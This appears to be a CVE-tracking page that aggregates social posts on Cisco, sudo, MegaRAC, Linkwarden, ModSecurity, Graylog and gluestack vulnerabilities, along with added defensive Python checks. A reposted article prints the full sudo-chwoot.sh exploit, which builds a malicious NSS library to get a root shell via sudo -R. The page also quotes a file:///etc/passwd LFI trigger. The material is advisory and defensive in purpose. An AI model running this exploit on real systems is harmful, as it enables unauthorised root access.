Overview
- Cisco
- Cisco Unified Communications Manager
Description
Statistics
- 4 Posts
- 100 Interactions
Fediverse

Are you fucking kidding me Cisco? Again?
sev:CRIT 10.0
🥳
A vulnerability in Cisco Unified Communications Manager (Unified CM) and Cisco Unified Communications Manager Session Management Edition (Unified CM SME) could allow an unauthenticated, remote attacker to log in to an affected device using the root account, which has default, static credentials that cannot be changed or deleted.

A note on the security advisory for CVE-2025-20309 in Cisco Unified Communications Manager which covers hard-coded credentials - as I understand it this only impacts a special version of the product that users would have to contact TAC to get. If that is a correct understanding then I would expect this to limit the likelihood that organizations are running the impacted versions.
Quoting from the advisory:
This vulnerability affects Cisco Unified CM and Unified CM SME Engineering Special (ES) releases 15.0.1.13010-1 through 15.0.1.13017-1, regardless of device configuration.
Note: ES releases are limited fix releases that are distributed only by the Cisco Technical Assistance Center (TAC).

@_newick NIST hasn't published it then. It's also available here: https://www.cve.org/CVERecord?id=CVE-2025-20309

🚨 CRITICAL: CVE-2025-20309 in Cisco Unified CM (v15.0.1.13010-1 to 13017-1) allows remote root access via unchangeable hard-coded creds. Patch as soon as available & restrict access! https://radar.offseq.com/threat/cve-2025-20309-use-of-hard-coded-credentials-in-ci-1eaa1647 #OffSeq #Cisco #Vuln #InfoSec
Overview
- Sudo project
- Sudo
Description
Statistics
- 6 Posts
- 47 Interactions
Fediverse

„Sudo before 1.9.17p1 allows local users to obtain root access because /etc/nsswitch.conf from a user-controlled directory is used with the --chroot option.“
https://euvd.enisa.europa.eu/vulnerability/EUVD-2025-19673
You should update sudo.
You also might want to think about using an alternative to sudo, considering its high level of complexity in code and configuration.
„doas“ is much leaner in both code and configuration, which helps to avoid certain problems.
https://github.com/slicer69/doas/
#Unix #Security #CVE_2025_32463

Local Privilege Escalation to Root via Sudo Chroot in Linux https://github.com/kh4sh3i/CVE-2025-32463

Another one to keep in mind for future CTF challenges:
"CVE-2025-32463: sudo local privilege escalation via chroot option"
An attacker can leverage sudo's -R (--chroot) option to run arbitrary commands as root, even if they are not listed in the sudoers file.
Sudo versions 1.9.14 to 1.9.17 affected.
https://www.openwall.com/lists/oss-security/2025/06/30/3 #infosec #cve

Once upon a time, a hundred years ago, when I first started with #Linux, #sudo wasn't really a thing. And then it became one, and some of us rolled our eyes a bit at "sudo su" and the like, but over time it became pretty common.
But between what @pid_eins has been going on about around #run0, and @trifectatech's #sudors, maybe it's time to go back to not having vanilla sudo on the machine again?
https://www.stratascale.com/vulnerability-alert-CVE-2025-32463-sudo-chroot

Linux Pwned! Privilege Escalation on SUDO in 5 seconds. HackerHood tests the CVE-2025-32463 exploit
Yesterday, Red Hot Cyber published an in-depth look at a serious vulnerability discovered in SUDO (CVE-2025-32463), which allows privilege escalation to root in Linux environments by exploiting an abuse of the chroot function.
The exploit, made public by Stratascale, shows how an unprivileged user can obtain root access through a precise chain of operations that exploit incorrect behaviour in the handling of child processes in chroot environments.
Field test: over to Manuel Roccon of the HackerHood group
Manuel Roccon, a researcher with Red Hot Cyber's HackerHood group, wanted to get his hands on the exploit to verify its reach concretely and to assess its reproducibility in real environments. "I couldn't resist the temptation to try it in an isolated environment. It is impressive how direct and clean the mechanism is, once the requirements set by the PoC are met," says Manuel.
The team then tested the Proof of Concept published by Stratascale, Exploit CVE-2025-32463 – sudo chroot. The result? Privilege escalation achieved successfully.
youtube.com/embed/-GxiqS-f7Yg?…
Exploit details
The exploit takes advantage of a condition in which sudo executes a command in a chroot environment while nonetheless leaving the child process some room to escape the chroot and manipulate the process namespace until it obtains full access as the root user.
The CVE-2025-32463 exploit, demonstrated in the sudo-chwoot.sh PoC by Rich Mirch (Stratascale CRU), exploits a vulnerability in sudo that lets an unprivileged user obtain root privileges when sudo is run with the -R option (which specifies a chroot directory). The script creates a temporary environment (/tmp/sudowoot.stage.*), compiles a malicious shared library (libnss_/woot1337.so.2) containing a constructor function that elevates privileges and opens a root shell (/bin/bash), and forces sudo to load it as an NSS library in the chroot context.
The technique exploits a logic error in the handling of the NSS library in chroot environments, where sudo dynamically loads external libraries without isolating them properly. The script sets up a fake nsswitch.conf configuration to force the use of its own library, placing it inside the woot/ directory, which acts as the virtual root for the chroot. When sudo -R woot woot is executed, the woot1337.so.2 library is loaded and its code runs automatically thanks to the __attribute__((constructor)) attribute, thereby achieving privilege escalation.
The fundamental requirements for successfully exploiting this vulnerability include:
- The use of chroot via sudo being enabled.
- The absence of certain restrictions in security profiles (such as AppArmor or SELinux).
- A permissive sudoers configuration.
Below are the simple lines:

```bash
#!/bin/bash
# sudo-chwoot.sh
# CVE-2025-32463 – Sudo EoP Exploit PoC by Rich Mirch
# @ Stratascale Cyber Research Unit (CRU)
STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)
cd ${STAGE?} || exit 1
cat > woot1337.c<<EOF
#include
__attribute__((constructor)) void woot(void) {
setreuid(0,0);
setregid(0,0);
chdir("/");
execl("/bin/bash", "/bin/bash", NULL);
}
EOF
mkdir -p woot/etc libnss_
echo "passwd: /woot1337" > woot/etc/nsswitch.conf
cp /etc/group woot/etc
gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c
echo "woot!"
sudo -R woot woot
rm -rf ${STAGE?}
```
Conclusions
The test carried out by Manuel Roccon shows that this vulnerability is not merely theoretical but fully exploitable in production environments that are not properly protected. In DevOps or containerised scenarios, where the use of sudo and chroot is common, the risks increase considerably.
Red Hot Cyber and the HackerHood group recommend immediately updating SUDO to the latest available version and reviewing the security configurations relating to chroot and sudoers permissions.
Security starts with awareness. Keep following us for technical analyses, tested PoCs and up-to-date reports.
The article Linux Pwned! Privilege Escalation on SUDO in 5 seconds. HackerHood tests the CVE-2025-32463 exploit comes from the cybersecurity blog.
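To turn the version range quoted in the oss-security post above (sudo 1.9.14 to 1.9.17 affected, fixed in 1.9.17p1) and the Red Hot Cyber article's "update sudo" recommendation into a check an administrator can run, here is an added Python example. It is not code from the oss-security post, from Stratascale or from Red Hot Cyber: it parses `sudo --version` output, orders sudo's `pN` patch levels correctly (so 1.9.17 sorts before 1.9.17p1), and classifies an upstream version against the stated range. The sample transcript is constructed.

```python
import re
import subprocess

# Affected range as stated in the posts above (CVE-2025-32463):
# sudo 1.9.14 through 1.9.17 affected, fixed in 1.9.17p1.
AFFECTED_MIN = (1, 9, 14, 0)
FIXED_IN = (1, 9, 17, 1)

# The first line of `sudo --version` looks like "Sudo version 1.9.15p5".
_VERSION_RE = re.compile(r"^Sudo version (\d+)\.(\d+)\.(\d+)(?:p(\d+))?", re.MULTILINE)


def parse_sudo_version(text):
    """Extract (major, minor, micro, patchlevel) from `sudo --version` output.

    A release without a 'pN' suffix gets patchlevel 0, so 1.9.17 sorts
    before 1.9.17p1, matching how sudo orders its own releases.
    Returns None when no version line is present.
    """
    match = _VERSION_RE.search(text)
    if match is None:
        return None
    major, minor, micro, patch = match.groups()
    return (int(major), int(minor), int(micro), int(patch or 0))


def is_affected(version):
    """True if an upstream sudo at this version falls inside the affected range."""
    return AFFECTED_MIN <= version < FIXED_IN


def assess(version_output):
    """Classify a `sudo --version` transcript as 'affected', 'not-affected' or 'unknown'."""
    version = parse_sudo_version(version_output)
    if version is None:
        return "unknown", None
    return ("affected" if is_affected(version) else "not-affected"), version


def assess_local_sudo():
    """Run `sudo --version` on this host (needs no privileges) and classify it."""
    result = subprocess.run(["sudo", "--version"], capture_output=True, text=True, check=False)
    return assess(result.stdout)


# Constructed sample transcript in the shape `sudo --version` prints
# (the plugin lines appear when it is run as root).
SAMPLE_OUTPUT = (
    "Sudo version 1.9.15p5\n"
    "Sudoers policy plugin version 1.9.15p5\n"
    "Sudoers file grammar version 50\n"
    "Sudoers I/O plugin version 1.9.15p5\n"
)

if __name__ == "__main__":
    print(assess(SAMPLE_OUTPUT))
    print(assess_local_sudo())
```

The version string alone is only reliable in one direction: 1.9.17p1 or later is fixed, but distribution packages often backport the fix without bumping the version, so an "affected" verdict on a vendor-packaged sudo means "check the distribution's advisory for this package build", not "exploitable".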
Overview
Description
Statistics
- 2 Posts
- 1 Interaction
Fediverse

This critical flaw in MegaRAC threatens thousands of servers, including ones that are powered off! https://www.it-connect.fr/faille-ami-megarac-cve-2024-54085/ #ActuCybersécurité #Cybersécurité #Vulnérabilité

Eclypsium has released two Nuclei templates to detect BMC vulnerabilities: CVE-2024-54085 (recently added to the CISA KEV) and CVE-2023-34329 (very similar). Please use them and send us feedback! Happy patching!
Blog post: https://eclypsium.com/blog/eclypsium-releases-tools-for-detecting-ami-megarac-bmc-vulnerabilities/
Overview
- Sudo project
- Sudo
Description
Statistics
- 1 Post
- 40 Interactions
Fediverse
Overview
- linkwarden
- linkwarden
Description
Statistics
- 1 Post
- 3 Interactions
Fediverse

Hilarious LFI in Linkwarden.
https://github.com/linkwarden/linkwarden/security/advisories/GHSA-rfc2-x8hr-536q
sev:HIGH 8.7 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
Linkwarden is a self-hosted, open-source collaborative bookmark manager to collect, organize and archive webpages. In version 2.10.2, the server accepts links of the format file:///etc/passwd and doesn't do any validation before sending them to parsers and playwright; this can result in a leak of other users' links (and in some cases it might be possible to leak environment secrets). This issue has been patched in version 2.10.3, which has not been made public at time of publication.
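The advisory's root cause is a missing check on the URL scheme before a submitted link reaches the fetchers. The following Python is an added illustration of that check, not Linkwarden's code: an allowlist-based validator that admits only absolute http(s) URLs with a host, refuses file:, javascript:, data: and scheme-less input, and normalises what it accepts. The submitted URLs in the batch helper are constructed samples.

```python
from urllib.parse import urlsplit, urlunsplit

# Schemes a link-archiving service should hand to its fetchers and parsers.
ALLOWED_SCHEMES = frozenset({"http", "https"})


class InvalidLinkError(ValueError):
    """Raised for a URL the service must refuse before any fetch happens."""


def validate_link_url(raw):
    """Return a normalised http(s) URL, or raise InvalidLinkError.

    Rejects non-http(s) schemes (file:, ftp:, javascript:, data:, ...),
    scheme-less paths, URLs without a host, and embedded credentials.
    """
    if not isinstance(raw, str):
        raise InvalidLinkError("URL must be a string")
    parts = urlsplit(raw.strip())          # strip() defeats " FILE:///..." style padding
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        raise InvalidLinkError(f"scheme not allowed: {scheme or '(none)'}")
    if not parts.hostname:                 # catches "http:///etc/passwd"
        raise InvalidLinkError("URL has no host")
    if parts.username is not None or parts.password is not None:
        raise InvalidLinkError("credentials in URL are not allowed")
    # Drop the fragment (never sent to a server) and normalise an empty path.
    return urlunsplit((scheme, parts.netloc, parts.path or "/", parts.query, ""))


def classify_links(urls):
    """Split a batch of submitted links into accepted (normalised) and rejected (url, reason)."""
    accepted, rejected = [], []
    for url in urls:
        try:
            accepted.append(validate_link_url(url))
        except InvalidLinkError as exc:
            rejected.append((url, str(exc)))
    return accepted, rejected


if __name__ == "__main__":
    # Constructed submissions: one legitimate link and several that must be refused.
    batch = [
        "https://example.com/article?id=7#top",
        "file:///etc/passwd",
        " FILE:///etc/passwd",
        "/etc/passwd",
        "javascript:alert(1)",
        "http:///etc/passwd",
        "http://user:secret@example.com/",
    ]
    for line in classify_links(batch):
        print(line)
```

This check decides only what a URL may look like; it does not resolve the host, so deciding which network destinations the fetcher is allowed to reach is a separate control applied at fetch time.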
Overview
- owasp-modsecurity
- ModSecurity
Description
Statistics
- 1 Post
- 2 Interactions
Fediverse

Whoopsie. DoS in ModSecurity.
https://github.com/owasp-modsecurity/ModSecurity/security/advisories/GHSA-gw9c-4wfm-vj3x
sev:MED 6.5 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
ModSecurity is an open source, cross platform web application firewall (WAF) engine for Apache, IIS and Nginx. In versions 2.9.8 to before 2.9.11, an empty XML tag can cause a segmentation fault. If SecParseXmlIntoArgs is set to On or OnlyArgs, and the request type is application/xml, and at least one XML tag is empty (eg ), then a segmentation fault occurs. This issue has been patched in version 2.9.11. A workaround involves setting SecParseXmlIntoArgs to Off.
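The trigger in the advisory above, an empty XML element reaching code that assumes every element carries content, is a failure mode any XML-to-arguments flattener has to handle. The following Python is an added illustration of that edge case, not ModSecurity's code: a flattener that turns a request body into (name, value) pairs the way a WAF exposes a body as arguments, with an unguarded leaf handler (which fails on an empty element) beside a guarded one (which maps it to an empty string), and a constructed sample body containing one empty element.

```python
import xml.etree.ElementTree as ET


def _local_name(tag):
    """Drop an XML namespace prefix of the form {uri}name."""
    return tag.rsplit("}", 1)[-1]


def _walk(node, path, args, guarded):
    name = f"{path}.{_local_name(node.tag)}" if path else _local_name(node.tag)
    children = list(node)
    if children:
        for child in children:
            _walk(child, name, args, guarded)
    elif guarded:
        # <tag/> and <tag></tag> both give node.text == None; map that to "".
        args.append((name, (node.text or "").strip()))
    else:
        # Unguarded leaf handling assumes every leaf has text. On an empty
        # element node.text is None and .strip() raises AttributeError, the
        # Python analogue of dereferencing a NULL content pointer in C.
        args.append((name, node.text.strip()))
    for attr, value in node.attrib.items():
        args.append((f"{name}@{attr}", value))


def xml_to_args(body, guarded=True, max_args=1000):
    """Flatten an XML request body into (name, value) pairs, one per leaf
    element or attribute. Malformed XML or an oversized body raises ValueError."""
    try:
        root = ET.fromstring(body)
    except ET.ParseError as exc:
        raise ValueError(f"malformed XML: {exc}") from exc
    args = []
    _walk(root, "", args, guarded)
    if len(args) > max_args:
        raise ValueError("too many arguments in body")
    return args


def parse_outcome(body, guarded):
    """Return 'ok' or the exception class name, to compare both leaf handlers."""
    try:
        xml_to_args(body, guarded=guarded)
        return "ok"
    except Exception as exc:
        return type(exc).__name__


# Constructed sample body: one empty element, the advisory's trigger condition.
SAMPLE_BODY = '<order><item>widget</item><note></note><qty unit="pcs">3</qty></order>'

if __name__ == "__main__":
    print(parse_outcome(SAMPLE_BODY, guarded=False))  # unguarded handler fails
    print(xml_to_args(SAMPLE_BODY))                    # guarded handler yields ("order.note", "")
```

The point generalises beyond the empty-tag case: whatever produces the argument list must tolerate absent content, malformed input and oversized documents, because the WAF parses attacker-controlled bodies before any rule runs, so a parser failure is an outage rather than a blocked request.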
Overview
- Graylog2
- graylog2-server
Description
Statistics
- 1 Post
- 2 Interactions
Fediverse

PrivEsc in Graylog.
https://github.com/Graylog2/graylog2-server/security/advisories/GHSA-3m86-c9x3-vwm9
sev:HIGH 8.8 - CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
Graylog is a free and open log management platform. In versions 6.2.0 to before 6.2.4 and 6.3.0-alpha.1 to before 6.3.0-rc.2, Graylog users can gain elevated privileges by creating and using API tokens for the local Administrator or any other user for whom the malicious user knows the ID. For the attack to succeed, the attacker needs a user account in Graylog. They can then proceed to issue hand-crafted requests to the Graylog REST API and exploit a weak permission check for token creation. This issue has been patched in versions 6.2.4 and 6.3.0-rc.2. A workaround involves disabling the respective configuration found in System > Configuration > Users > "Allow users to create personal access tokens".
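The advisory above describes a weak permission check on token creation: an authenticated user could mint a token for any user ID they knew. The following Python is an added illustration of that check, not Graylog's code: a small in-memory token service with the weak variant (caller only has to be logged in) beside a correct one that binds the token to the caller's own identity unless the caller is an administrator and that honours a feature switch modelled on the "Allow users to create personal access tokens" setting. Letting administrators keep creating tokens for other users while the switch is off is my assumption about the policy, not something the advisory states.

```python
from dataclasses import dataclass, field
import secrets


class Forbidden(Exception):
    """Authorisation failure for a token-management request."""


@dataclass(frozen=True)
class User:
    user_id: str
    is_admin: bool = False


@dataclass
class TokenService:
    # Analogue of the "Allow users to create personal access tokens" switch.
    allow_user_tokens: bool = True
    # Issued token -> owning user ID (the identity the token will act as).
    tokens: dict = field(default_factory=dict)

    def _mint(self, owner_id):
        token = secrets.token_urlsafe(32)
        self.tokens[token] = owner_id
        return token

    def create_token_weak(self, actor, target_user_id):
        """Weak check: only confirms the caller is logged in, so any user can
        mint a token for any user ID they know, including an administrator's."""
        if actor is None:
            raise Forbidden("authentication required")
        return self._mint(target_user_id)

    def create_token(self, actor, target_user_id):
        """Correct check: non-admins may only create tokens for themselves, and
        only while the feature switch is on (admin exception is an assumption)."""
        if actor is None:
            raise Forbidden("authentication required")
        if not actor.is_admin:
            if not self.allow_user_tokens:
                raise Forbidden("personal access tokens are disabled")
            if actor.user_id != target_user_id:
                raise Forbidden("a user may only create tokens for themselves")
        return self._mint(target_user_id)

    def whoami(self, token):
        """Identity a presented token would act as, or None if unknown."""
        return self.tokens.get(token)


def attempt(service, method, actor, target_user_id):
    """Run one token-creation request; return the identity obtained or 'forbidden'."""
    try:
        token = getattr(service, method)(actor, target_user_id)
    except Forbidden:
        return "forbidden"
    return service.whoami(token)


if __name__ == "__main__":
    # Constructed accounts: one low-privilege user and one administrator.
    svc = TokenService()
    low, admin = User("u-low"), User("u-admin", is_admin=True)
    print(attempt(svc, "create_token_weak", low, "u-admin"))  # low user now acts as admin
    print(attempt(svc, "create_token", low, "u-admin"))       # forbidden
```

The contrast to check in any token or API-key endpoint is the same: authentication answers "who is calling", and the endpoint still has to compare that identity against the identity the token will carry.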
Overview
Description
Statistics
- 1 Post
- 1 Interaction
Overview
- gluestack
- gluestack-ui
Description
Statistics
- 1 Post
Fediverse

🚨 CRITICAL: CVE-2025-53104 in gluestack-ui (< e6b4271) allows command injection via discussion-to-slack.yml GitHub Actions workflow. Remove/disable the workflow to prevent remote code execution! https://radar.offseq.com/threat/cve-2025-53104-cwe-77-improper-neutralization-of-s-24128111 #OffSeq #Infosec #GitHubActions #AppSec